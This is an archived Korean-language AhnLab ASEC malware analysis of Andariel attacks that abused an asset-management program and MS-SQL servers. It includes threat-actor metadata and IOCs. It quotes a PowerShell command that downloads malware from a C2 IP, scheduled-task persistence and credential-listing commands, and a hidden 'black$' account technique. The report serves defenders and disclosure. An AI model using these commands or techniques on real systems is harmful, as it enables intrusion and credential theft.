{ "id": "76244970-a92c-434a-9ec7-7d83e49825ed", "created_at": "2026-04-06T00:15:50.58694Z", "updated_at": "2026-04-10T03:37:41.212813Z", "deleted_at": null, "sha1_hash": "a5af4ba85da685a118afff56a007b6ec5e9c203d", "title": "자산 관리 프로그램을 악용한 공격 정황 포착 (Andariel 그룹) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 990775, "plain_text": "자산 관리 프로그램을 악용한 공격 정황 포착 (Andariel 그룹) -\r\nASEC\r\nBy ATCP\r\nPublished: 2023-11-10 · Archived: 2026-04-05 15:13:07 UTC\r\nASEC 분석팀은 Lazarus 그룹과 협력 관계이거나 하위 조직으로 알려진 Andariel 위협 그룹이 최근 특정 자\r\n산 관리 프로그램을 이용한 공격을 통해 악성코드를 유포하고 있는 정황을 확인하였다.\r\nAndariel 그룹은 최초 침투 과정에서 주로 스피어 피싱 공격이나 워터링 홀 공격 그리고 공급망 공격을 이\r\n용하며, 이외에도 악성코드 설치 과정에서 중앙 관리 솔루션을 악용하는 사례도 존재한다. 최근에는\r\nLog4Shell 및 Innorix Agent 등 여러 프로그램에 대한 취약점들을 이용하여 국내 다양한 기업군에 공격을\r\n해오고 있다. [1]\r\n이번에 확인된 공격은 국내의 또 다른 자산 관리 프로그램이 사용되었으며, 이외에도 MS-SQL 서버를 대\r\n상으로 한 공격도 동시에 확인되었다. 이러한 공격을 통해 설치된 악성코드들로는 TigerRat뿐만 아니라\r\nNukeSped 변종, Black RAT, 오픈 소스 악성코드인 Lilith RAT 등 다양한 악성코드들이 존재한다. 공격 대\r\n상으로 확인된 국내 통신 업체, 반도체 제조업 등 기존 공격 대상 사례들과 유사하다.\r\n1. 최초 침투 단계\r\n최근 국내 특정 자산 관리 프로그램이 Andariel 그룹의 악성코드들을 설치한 로그가 자사 AhnLab Smart\r\nDefense (ASD) 로그에서 확인되었다. 물론 해당 로그만으로는 취약점을 이용한 공격인지 단순한 악용인\r\n지는 알 수 없다. 공격 대상 시스템에서 실행 중인 자산 관리 프로그램은 최종적으로 다음과 같은 파워쉘\r\n명령을 이용해 악성코드를 다운로드하였다.\r\nFigure 1. 자산 관리 프로그램을 이용하여 악성코드 다운로드\r\n파워쉘 명령 : wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\\Users\\public\\credis.exe\r\nAndariel 그룹은 파워쉘 외에도 mshta.exe 프로세스를 이용해 악성코드를 다운로드하기도 하였다. 다음은\r\nC\u0026C 주소에 업로드된 HTML 악성코드로서 TigerRat과 같은 Andariel 그룹의 다른 악성코드들을 다운로드\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 1 of 13\n\n하는 기능을 담당한다.\r\nFigure 2. 다운로더 스크립트\r\n이전 공격 사례에서 Andariel 그룹은 Innorix Agent 뿐만 아니라 스피어 피싱 공격을 함께 사용하였다. 이번\r\n공격 사례에서 눈에 띄는 점은 MS-SQL 서버를 이용한 악성코드 설치 사례가 함께 존재한다는 점이다. 공\r\n격자는 부적절하게 관리되는 MS-SQL 서버를 공격해 NukeSped를 설치한 것으로 추정된다. Remcos RAT,\r\nMallox 랜섬웨어 등의 악성코드들은 주로 무차별 대입 공격이나 사전 공격에 취약한 자격 증명 정보를 갖\r\n는 MS-SQL 서버를 대상으로 하는 공격을 통해 설치되는데, 해당 시스템에서는 과거에도 다른 공격자들이\r\n이러한 악성코드를 설치하려고 시도했던 로그가 확인되기 때문이다. 즉 Andariel 그룹 또한 최근에는 부적\r\n절하게 관리되는 MS-SQL 서버를 공격 벡터로 활용하고 있는 것으로 보인다.\r\nFigure 3. MS-SQL 서버를 통해 설치된 NukeSped 악성코드\r\n공격 과정에서는 일반적인 MS-SQL 서버 대상 공격 사례와 유사하게 권한 상승을 목적으로 PrintSpoofer\r\n악성코드가 함께 사용되었다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 2 of 13\n\nFigure 4. MS-SQL 서버 공격에 함께 사용된 PrintSpoofer 권한 상승 악성코드\r\n2. 공격에 사용된 악성코드\r\n위의 공격을 통해 설치된 백도어 악성코드들로는 Andariel 그룹의 대표적인 악성코드들 중 하나인\r\nTigerRat, Black RAT, NukeSped 변종들이 있다. 이러한 악성코드들은 기존 공격과 거의 유사하지만 이번 공\r\n격 사례에서는 오픈 소스 악성코드인 Lilith RAT이 사용된 것이 특징이다. 이외에도 최근 Go 언어로 개발\r\n된 악성코드들을 자주 사용하는 Andariel 그룹의 흐름과 유사하게 Go 언어로 개발된 다운로더 악성코드도\r\n함께 확인된다.\r\n2.1. TigerRat\r\n국내 자산 관리 프로그램을 통해 설치된 악성코드는 TigerRat 이었다. Andariel 그룹은 과거 워터링 홀 공격\r\n부터 Log4Shell 취약점 공격 등 대부분의 국내 타켓 공격에서 TigerRat을 사용하고 있다. [2] TigerRat은 백\r\n도어 악성코드로서 파일 업로드 및 다운로드, 명령 실행, 기본 정보 수집, 키로깅, 스크린 캡쳐, 포트 포워\r\n딩 등 다양한 기능을 지원한다.\r\n일반적인 백도어 악성코드들과의 차이점이라고 한다면 C\u0026C 서버와의 최초 통신 과정에서 특정 문자열을\r\n주고받아야 하는 인증 과정이 존재한다는 점이다. 이번 공격에 사용된 TigerRat 또한 2023년에 확인된 유\r\n형들과 동일하게 0x20 크기의 랜덤한 문자열들이 인증에 사용되었다. 해당 문자열들은\r\n“fool”(dd7b696b96434d2bf07b34f9c125d51d), “iwan”(01ccce480c60fcdb67b54f4509ffdb56)에 대한 MD5 해시\r\n로 추정된다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 3 of 13\n\nFigure 5. C\u0026C 서버와의 인증에 사용된 문자열\r\nC\u0026C 요청 문자열 : dd7b696b96434d2bf07b34f9c125d51d\r\nC\u0026C 응답 문자열 : 01ccce480c60fcdb67b54f4509ffdb56\r\n2.2. Golang 다운로더\r\nAndariel 그룹은 2023년 경부터 다양한 백도어 악성코드들을 Go 언어로 제작하여 사용하고 있다. 이전 사\r\n례에서는 Black RAT, Goat RAT, DurianBeacon 등이 사용되었으며 이번 공격 사례에서는 Go 언어로 개발된\r\n다운로더 악성코드가 사용되었다. 해당 악성코드는 단순한 형태로서 C\u0026C 서버에 접속하여 추가 페이로\r\n드를 설치한다. 특징이 있다면 C\u0026C 서버와의 통신에 Base64 암호화를 사용한다는 점이 있다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 4 of 13\n\nFigure 6. 다운로더 악성코드의 Base64 복호화 루틴\r\n공격자는 국내 자산 관리 프로그램을 악용하여 직접 TigerRat을 설치하기도 했지만 Golang 다운로더를 설\r\n치한 이후 해당 악성코드가 추가 페이로드를 설치하는 방식도 사용하였다. Golang 다운로더를 통해 설치\r\n된 악성코드들로는 TigerRat과 NukeSped 변종 악성코드가 있다.\r\n2.3. NukeSped 변종\r\nNukeSped는 C\u0026C 서버로부터 명령을 받아 감염 시스템을 제어할 수 있는 백도어 악성코드이다. 공격에 사\r\n용된 NukeSped 변종 중 첫 번째 유형은 최초 C\u0026C 서버와의 통신 시 POST 메소드를 이용해 패킷을 전송하\r\n며 이후 C\u0026C 서버로부터 전달받은 명령을 수행한 결과는 구글 접속을 위장한 GET 메소드를 이용해 전송\r\n하는 점이 특징이다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 5 of 13\n\nFigure 7. C\u0026C 통신 패킷\r\n공격 과정에서는 또 다른 NukeSped 변종도 확인된다. 비록 크기는 23KB로 작지만 자가 삭제에 사용되는\r\n문자열은 기존 NukeSped 변종과 유사하다.\r\nFigure 8. NukeSped의 문자열\r\n2.4. Black RAT\r\nBlack RAT은 Go 언어로 개발된 백도어 악성코드로서 2023년에 Andariel 그룹의 공격 사례에서 최초로 확\r\n인되었다. 이번 공격에 사용된 Black RAT은 소스 코드 정보는 포함되어 있지 않지만 함수 이름이 기존\r\nBlack RAT과 거의 유사한 것을 통해 구분이 가능하다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 6 of 13\n\nFigure 9. Black RAT의 함수 목록\r\n2.5. Lilith RAT\r\nLilith RAT은 깃허브에 공개된 오픈 소스 RAT 악성코드이다. C++ 언어로 개발되었으며 원격 명령 실행, 지\r\n속성 유지, 자가 삭제 등 감염 시스템을 제어할 수 있는 다양한 기능들을 제공한다.\r\nFigure 10. Lilith RAT의 깃허브 페이지\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 7 of 13\n\nAndariel 그룹이 공격에 사용한 Lilith RAT은 바이너리에 존재하는 문자열들 중 상당수가 암호화되어 있는\r\n데 이는 파일 진단을 우회하기 위한 목적으로 추정된다. 하지만 모든 문자열들이 암호화된 것은 아니며 일\r\n부 문자열들은 Lilith RAT의 소스 코드와 동일하다.\r\nFigure 11. Lilith RAT의 문자열들\r\n2.6. 사용자 계정 추가\r\n공격자는 백도어 악성코드들을 이용해 감염 시스템을 제어하는 것 외에도 감염 시스템에 사용자 계정을\r\n추가하고 이를 은폐하였다. 이러한 작업은 직접 제작한 악성코드를 이용하였는데, 해당 악성코드는 감염\r\n시스템에 특정 사용자 계정이 존재할 때만 정상적으로 동작하기 때문에 이는 이미 감염 시스템에 대한 제\r\n어가 탈취된 이후라는 것을 의미한다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 8 of 13\n\nFigure 12. 특정 사용자의 존재 여부에 따라 분기되는 루틴\r\n일반적으로 공격자가 백도어를 이용해 감염 시스템을 제어할 수 있음에도 불구하고 사용자 계정을 추가\r\n하는 이유는 이후 원격 데스크톱을 이용해 GUI 환경에서 감염 시스템을 제어하고 지속성을 유지하기 위\r\n한 목적이다. 하지만 단순하게 계정만 추가한다면 시스템의 사용자가 로그인하는 과정에서 새롭게 생성\r\n된 사용자 계정을 인지할 수 있다.\r\n이러한 이유 때문에 악성코드는 사용자가 인지할 수 없도록 다음과 같은 과정을 진행한다. 먼저 계정 이름\r\n에 “$” 기호를 붙여 생성한 후 기존 사용자의 SAM 데이터 중 일부를 복사하여 생성한 “black$“ 계정에 덮\r\n어씌우는데 만약 기존 사용자가 관리자 계정이고 원격 데스크톱이 허용된 사용자라면 “black$” 계정 또한\r\n이러한 특성을 동일하게 가질 수 있다.\r\n참고로 Kimsuky 그룹에서 사용했던 악성코드들은 사용자 계정 추가 이후 관리자 그룹에 등록하고\r\nSpecialAccounts에 추가하며 방화벽에서도 해당 계정을 활성화시켰다. [3] 이러한 과정은 보안 제품에 의해\r\n쉽게 탐지 가능한데 Andariel 그룹은 위의 악성코드를 이용해 이러한 추가적인 작업 없이도 은폐된 계정을\r\n추가하였다는 점이 특징이다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 9 of 13\n\nFigure 13. 사용자 계정을 등록하고 은폐하는 Kimsuky 그룹의 악성코드\r\n3. 감염 이후\r\n공격자는 백도어 악성코드를 설치한 이후 지속성 유지를 위해 다음과 같은 명령을 실행하여 작업 스케줄\r\n러에 등록하였다.\r\nFigure 14. 공격자가 실행한 명령들\r\n\u003e schtasks /delete /tn “microsoft\\******” /f\r\n\u003e schtasks /create /tn “microsoft\\******” /tr “c:\\users\\%ASD%\\credis.exe” /sc onlogon /ru system\r\n\u003e schtasks /run /tn “microsoft\\windows\\mui\\route”\r\n이후에는 다음 명령들을 이용해 감염 시스템에 대한 정보를 조회하였다.\r\n\u003e cmd.exe /c “query user”\r\n\u003e cmd.exe /c “ipconfig”\r\n\u003e cmd.exe /c “whoami”\r\n\u003e cmd.exe /c “cmdkey /list”\r\n\u003e cmd.exe /c “netsat -nao | findstr 445”\r\n이외에도 다운로더 악성코드를 제거하거나 다른 프로세스를 종료하는 명령들도 확인된다.\r\n\u003e cmd.exe /c “del /f c:\\users\\%ASD%\\perf.exe”\r\n\u003e taskkill /f /pid 15036\r\n공격자는 백도어를 이용해 정보를 수집하기도 하지만 NirSoft 사의 CredentialsFileVIew, Network Password\r\nRecovery와 같은 HackTool들을 추가로 다운로드해 사용하기도 하였다. 해당 도구들은 감염 시스템에 저장\r\n된 자격 증명 정보와 공유 폴더에 대한 자격 증명 정보를 보여주는 도구로서 추후 감염 시스템이 존재하는\r\n조직의 내부 네트워크 상에서 측면 이동을 위해 사용될 수 있다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 10 of 13\n\nFigure 15. 악성코드 감염 이후 Netpass 다운로드 및 실행\r\n4. 결론\r\nAndariel 그룹은 Kimsuky, Lazarus 그룹과 함께 국내를 대상으로 활발하게 활동하고 있는 위협 그룹들 중\r\n하나이다. 초기에는 주로 안보와 관련된 정보를 획득하기 위해 공격을 전개하였지만 이후에는 금전적 이\r\n득을 목적으로 한 공격도 수행하고 있다. [4] 초기 침투 시 주로 스피어 피싱 공격이나 워터링 홀 공격 그리\r\n고 소프트웨어의 취약점을 이용하는 것으로 알려져 있으며 공격 과정에서 다른 취약점을 이용해 악성코\r\n드를 배포하는 정황도 확인되고 있다.\r\n최근 확인된 공격 사례에서는 취약한 MY-SQL 서버에 대한 공격뿐만 아니라 자산 관리 프로그램 등 회사\r\n내 여러 프로그램을 이용하여 공급망 공격을 수행하는 것으로 보인다. 사용자들은 출처가 불분명한 메일\r\n의 첨부 파일이나 웹 페이지에서 다운로드한 실행 파일은 각별히 주의해야 하며, 기업 보안 담당자는 자산\r\n관리 프로그램의 모니터링을 강화하고 프로그램 보안 취약점이 있다면 패치를 수행하여야 한다. 그리고\r\nOS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한\r\n악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.\r\n현재 V3에서는 아래와 같이 진단하고 있으며, IOC는 다음과 같다.\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 11 of 13\n\n파일 진단\r\n– Malware/Win.Generic.C5528992 (2023.10.25.00)\r\n– Malware/Win.Generic.C5528516 (2023.10.26.00)\r\n– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)\r\n– Backdoor/Win.Agent.C5518308 (2023.10.20.00)\r\n– Downloader/HTML.Agent.SC193459 (2023.10.19.03)\r\n– Downloader/HTML.Agent.SC193403 (2023.10.18.01)\r\n– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)\r\n– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)\r\n– HackTool/Win.CredentialsFileView (2022.04.20.00)\r\n– Backdoor/Win.Agent.R619279 (2023.11.01.01)\r\n– Backdoor/Win.Agent.C5534745 (2023.11.01.01)\r\n– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)\r\n– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)\r\n– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)\r\n행위 진단\r\n– Malware/MDP.Download.M1197\r\nMD5\r\n0414a2ab718d44bf6f7103cff287b312\r\n13b4ce1fc26d400d34ede460a8530d93\r\n232586f8cfe82b80fd0dfa6ed8795c56\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 12 of 13\n\n33a3da2de78418b89a603e28a1e8852c\r\n3a0c8ae783116c1840740417c4fbe678\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nURL\r\nhttp[:]//109[.]248[.]150[.]147[:]8080/\r\nhttp[:]//109[.]248[.]150[.]147[:]8443/\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]html\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]png\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/view[.]php\r\n추가 IoC는 ATIP에서 제공됩니다.\r\nAhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용\r\n은 아래 배너를 클릭하여 확인해보세요.\r\nSource: https://asec.ahnlab.com/ko/58215/\r\nhttps://asec.ahnlab.com/ko/58215/\r\nPage 13 of 13", "extraction_quality": 1, "language": "KO", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/ko/58215/" ], "report_names": [ "58215" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434550, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a5af4ba85da685a118afff56a007b6ec5e9c203d.pdf", "text": "https://archive.orkl.eu/a5af4ba85da685a118afff56a007b6ec5e9c203d.txt", "img": "https://archive.orkl.eu/a5af4ba85da685a118afff56a007b6ec5e9c203d.jpg" } }